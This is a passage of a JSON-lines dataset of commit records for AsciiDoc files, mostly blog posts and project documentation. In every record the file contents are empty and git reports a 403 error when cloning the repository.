home.","repos":"flyingmachine\/whoops,flyingmachine\/whoops,flyingmachine\/whoops","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flyingmachine\/whoops.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4668b078dffa3036946e91a378581fa4fe74541f","subject":"Update 20161110-1232-showoff-zone.adoc","message":"Update 20161110-1232-showoff-zone.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/20161110-1232-showoff-zone.adoc","new_file":"_posts\/20161110-1232-showoff-zone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc20f7abe542e780ed43c169411b23e6b4ddd7e9","subject":"Update 2017-01-06-vultrandlaravel.adoc","message":"Update 2017-01-06-vultrandlaravel.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-06-vultrandlaravel.adoc","new_file":"_posts\/2017-01-06-vultrandlaravel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69cf3b5936d97fac265b2d9d9d6f1ba84856496c","subject":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","message":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53af86d1270914b50b3cb2dead67c79ada85d028","subject":"Add doc","message":"Add doc\n\n","repos":"OpenHFT\/Chronicle-Queue,OpenHFT\/Chronicle-Queue","old_file":"src\/main\/java\/net\/openhft\/chronicle\/queue\/internal\/AnalyticsMain.adoc","new_file":"src\/main\/java\/net\/openhft\/chronicle\/queue\/internal\/AnalyticsMain.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Queue.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8f2a937a3a5cbc86f70ac261f5dbd8f8e3bbfeda","subject":"Update 2016-01-05-Hello-There.adoc","message":"Update 2016-01-05-Hello-There.adoc","repos":"duggiemitchell\/JavascriptMuse,duggiemitchell\/JavascriptMuse,duggiemitchell\/JavascriptMuse","old_file":"_posts\/2016-01-05-Hello-There.adoc","new_file":"_posts\/2016-01-05-Hello-There.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/duggiemitchell\/JavascriptMuse.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"940b481ad0f1fde32ca0ac34c4d738e8778f1c12","subject":"Update 2016-12-01-Salut-poto.adoc","message":"Update 2016-12-01-Salut-poto.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-01-Salut-poto.adoc","new_file":"_posts\/2016-12-01-Salut-poto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d23da5897405622fa2e98046edb9103134dc4fc1","subject":"more on resources and hypermedia","message":"more on resources and hypermedia\n","repos":"EMBL-EBI-SUBS\/subs,EMBL-EBI-SUBS\/subs","old_file":"subs-api\/src\/main\/resources\/docs\/submissions.adoc","new_file":"subs-api\/src\/main\/resources\/docs\/submissions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMBL-EBI-SUBS\/subs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a0da276cb420f5f329d04851dfb11a7b95b6e3fd","subject":"Update 2016-08-19-Android.adoc","message":"Update 2016-08-19-Android.adoc","repos":"iwangkai\/iwangkai.github.io,iwangkai\/iwangkai.github.io,iwangkai\/iwangkai.github.io,iwangkai\/iwangkai.github.io","old_file":"_posts\/2016-08-19-Android.adoc","new_file":"_posts\/2016-08-19-Android.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/iwangkai\/iwangkai.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14e9d935fafb9d15ebb754ebd4369762daaf3edf","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a33cb0cee564c4ffcdfa8820040b27fefffd5d18","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/sr-oneshot.asciidoc","new_file":"_brainstorms\/sr-oneshot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4cb3f3dc34a0090e0e98d19b2336a37237213215","subject":"Update 2016-05-01-First-try.adoc","message":"Update 2016-05-01-First-try.adoc","repos":"christofmarti\/blog,christofmarti\/blog,christofmarti\/blog,christofmarti\/blog","old_file":"_posts\/2016-05-01-First-try.adoc","new_file":"_posts\/2016-05-01-First-try.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/christofmarti\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"afae10368cbf21cfa6937f2ffb3bfcf8adef6e96","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b84738aa4f2fd93cb01d2137931fb1d33d80e5be","subject":"Update 2018-11-08-develop.adoc","message":"Update 2018-11-08-develop.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-develop.adoc","new_file":"_posts\/2018-11-08-develop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67fc44cfbe52e690def973d65bf41007ebfbc96c","subject":"y2b create post Trying Some Bose Headphones","message":"y2b create post Trying Some Bose 
Headphones","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-23-Trying-Some-Bose-Headphones.adoc","new_file":"_posts\/2015-11-23-Trying-Some-Bose-Headphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49005afe0afe687851273c1abda6f1e86f8c8e80","subject":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","message":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a9b5e2028d22a542d104de5c485d5e0693dab0c","subject":"Update 2017-12-11-Job-Hunting-Tips-and-Tricks.adoc","message":"Update 2017-12-11-Job-Hunting-Tips-and-Tricks.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-11-Job-Hunting-Tips-and-Tricks.adoc","new_file":"_posts\/2017-12-11-Job-Hunting-Tips-and-Tricks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"43625cf5d958ee6a2232190270c5cb3365f4980d","subject":"Reactive web resources documentation","message":"Reactive web resources documentation\n\nIncludes Vert.x extension installation, async and streaming over SSE.\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/going-reactive-with-vertx.adoc","new_file":"docs\/src\/main\/asciidoc\/going-reactive-with-vertx.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e5a816514c8beee7dc3cafd3332608d09d91ea3e","subject":"Create f5_sdn_config.adoc","message":"Create f5_sdn_config.adoc","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"admin_guide\/f5_sdn_config.adoc","new_file":"admin_guide\/f5_sdn_config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3cf051fc1d7741998028799bae8862876af8def2","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of 
index.adoc\n","repos":"spring-cloud\/spring-cloud-contract,spring-cloud\/spring-cloud-contract,spring-cloud\/spring-cloud-contract","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-contract.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"51a953ce539eb05a5f603f6ffa5fea7830484244","subject":"Update 2018-03-30-google-cloud-container-builder-with-docker-mysql.adoc","message":"Update 2018-03-30-google-cloud-container-builder-with-docker-mysql.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-30-google-cloud-container-builder-with-docker-mysql.adoc","new_file":"_posts\/2018-03-30-google-cloud-container-builder-with-docker-mysql.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76c7531dd3c8eee1c169574d3423ae52b70007b0","subject":"Add missing doc for `endpoint local-id`","message":"Add missing doc for `endpoint local-id`\n\nAn adoc manpage file for this command.\n","repos":"globus\/globus-cli,globus\/globus-cli","old_file":"adoc\/endpoint_local_id.1.adoc","new_file":"adoc\/endpoint_local_id.1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/globus\/globus-cli.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"41bbe0df2fba772dce3864d72da6d934da2b4db8","subject":"Works on cache doc","message":"Works on cache doc\n","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/manpage\/tpcache.ini.adoc","new_file":"doc\/manpage\/tpcache.ini.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endurox-dev\/endurox.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"d05256a321eb836cba70c9ee18af358fb181c95d","subject":"Fixed wording in Packaging Types (#692)","message":"Fixed wording in Packaging Types (#692)\n\n","repos":"juangon\/wildfly-swarm,juangon\/wildfly-swarm,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm-core,kenfinnigan\/wildfly-swarm,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,juangon\/wildfly-swarm,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,nelsongraca\/wildfly-swarm,nelsongraca\/wildfly-swarm,nelsongraca\/wildfly-swarm,nelsongraca\/wildfly-swarm,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,kenfinnigan\/wildfly-swarm,nelsongraca\/wildfly-swarm","old_file":"docs\/concepts\/packaging-types.adoc","new_file":"docs\/concepts\/packaging-types.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wildfly-swarm\/wildfly-swarm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"5f7d91002ef9b9556446e76b1c0828971cfa5dad","subject":"Update 2015-04-16-Hypothermia-and-sponsors.adoc","message":"Update 2015-04-16-Hypothermia-and-sponsors.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-04-16-Hypothermia-and-sponsors.adoc","new_file":"_posts\/2015-04-16-Hypothermia-and-sponsors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6ee8d56f55610c749b6295598ab43cf7d0f0a52","subject":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","message":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","repos":"shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io","old_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shinchiro\/shinchiro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d663ece7d4770b705e7f7cfdec946935ce6e664","subject":"Update 2016-03-31-Mensajes-ocultos-parte-1.adoc","message":"Update 2016-03-31-Mensajes-ocultos-parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8bc1cae8a63e1703332df15c9323c6597b17f862","subject":"Update 2016-09-12-Too-deep-or-not-too-deep.adoc","message":"Update 2016-09-12-Too-deep-or-not-too-deep.adoc","repos":"ilyaeck\/ilyaeck.github.io,ilyaeck\/ilyaeck.github.io,ilyaeck\/ilyaeck.github.io,ilyaeck\/ilyaeck.github.io","old_file":"_posts\/2016-09-12-Too-deep-or-not-too-deep.adoc","new_file":"_posts\/2016-09-12-Too-deep-or-not-too-deep.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ilyaeck\/ilyaeck.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee6cf212b734b5af5726c29555d10b371c0bbbc0","subject":"Update 2015-09-03-Two.adoc","message":"Update 2015-09-03-Two.adoc","repos":"manueljordan\/manueljordan.github.io,manueljordan\/manueljordan.github.io,manueljordan\/manueljordan.github.io","old_file":"_posts\/2015-09-03-Two.adoc","new_file":"_posts\/2015-09-03-Two.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manueljordan\/manueljordan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3969457a4e697e48b823e04e91827b57162f0ae","subject":"y2b create post iPad 2 Review HD","message":"y2b create post iPad 2 Review 
HD","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-03-16-iPad-2-Review-HD.adoc","new_file":"_posts\/2011-03-16-iPad-2-Review-HD.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86052dff17eeb32e5a4b5a5a2aee9207944aa4df","subject":"Update 2015-09-28-A-Byte-of-Python.adoc","message":"Update 2015-09-28-A-Byte-of-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"359c2aac7221263219728a3e899840bf66f22053","subject":"Update 2016-07-04-A-Vicennial-Saga.adoc","message":"Update 2016-07-04-A-Vicennial-Saga.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-04-A-Vicennial-Saga.adoc","new_file":"_posts\/2016-07-04-A-Vicennial-Saga.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94554f316b763e4ebd24dcbadda77a77f86b181c","subject":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","message":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e37e69ee6d139b463e694e18bca85fab4c3d003","subject":"Update 2017-03-12-Getting-Started-With-a-NET-Core-Microservice-Using-VS-Code-Docker-on-OSX.adoc","message":"Update 2017-03-12-Getting-Started-With-a-NET-Core-Microservice-Using-VS-Code-Docker-on-OSX.adoc","repos":"dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io","old_file":"_posts\/2017-03-12-Getting-Started-With-a-NET-Core-Microservice-Using-VS-Code-Docker-on-OSX.adoc","new_file":"_posts\/2017-03-12-Getting-Started-With-a-NET-Core-Microservice-Using-VS-Code-Docker-on-OSX.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dannylane\/dannylane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"959887702641ead9e423eab785494873c1d623a2","subject":"Create ISSUE_TEMPLATE.asciidoc","message":"Create 
ISSUE_TEMPLATE.asciidoc","repos":"browncoat-ninjas\/nimoy,Luftzig\/nimoy","old_file":"ISSUE_TEMPLATE.asciidoc","new_file":"ISSUE_TEMPLATE.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/browncoat-ninjas\/nimoy.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"37d104bea3047e5be64c137c88fa5790e6cba6be","subject":"Update 2015-05-16-Faustino-loeza-Perez.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cda465114236dec7740deba30cb17afd6e4c1cd5","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72977edd7efe3f3cb00dad83c77141438fd97b80","subject":"Update 2015-07-16-Luquillo.adoc","message":"Update 2015-07-16-Luquillo.adoc","repos":"2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io","old_file":"_posts\/2015-07-16-Luquillo.adoc","new_file":"_posts\/2015-07-16-Luquillo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2mosquitoes\/2mosquitoes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0a4fefb9b8860acbc4c59fb95cd6239903ad233","subject":"Update 2017-01-07-Merry-Minimalist-Holidays.adoc","message":"Update 2017-01-07-Merry-Minimalist-Holidays.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2017-01-07-Merry-Minimalist-Holidays.adoc","new_file":"_posts\/2017-01-07-Merry-Minimalist-Holidays.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zestyroxy\/zestyroxy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db9f372e22405bb9c0cbae30de778eb88f604305","subject":"Update 2019-06-13-el-Clubo-Ahora-asi-suenan.adoc","message":"Update 2019-06-13-el-Clubo-Ahora-asi-suenan.adoc","repos":"dgrizzla\/dgrizzla.github.io,dgrizzla\/dgrizzla.github.io,dgrizzla\/dgrizzla.github.io,dgrizzla\/dgrizzla.github.io","old_file":"_posts\/2019-06-13-el-Clubo-Ahora-asi-suenan.adoc","new_file":"_posts\/2019-06-13-el-Clubo-Ahora-asi-suenan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dgrizzla\/dgrizzla.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"02bf48ba417ed08cbfb59d13aefa28fed20cb2d8","subject":"Add updated navigation to docs pages","message":"Add updated navigation to docs pages\n\nChange-Id: I1faeafcee5a80d52bc6d7959b6c0d85e5ef1d155\nReviewed-on: http:\/\/gerrit.sjc.cloudera.com:8080\/7916\nTested-by: jenkins\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b987f34a71a97a75663fcab66d28b08729c38bc6","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67d9d05bba336fee96e565bd4c797fe7cb5a007f","subject":"Update 2015-03-11-Query-parameters-talk-slides.adoc","message":"Update 2015-03-11-Query-parameters-talk-slides.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-03-11-Query-parameters-talk-slides.adoc","new_file":"_posts\/2015-03-11-Query-parameters-talk-slides.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1d80d93ccf91dc4ec75823d66ed21bee94d7758","subject":"resolving conflict","message":"resolving conflict\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"49914c740b3c36c0b9aa8ab283cde93017c6221b","subject":"y2b create post HTC One Unboxing \\u0026 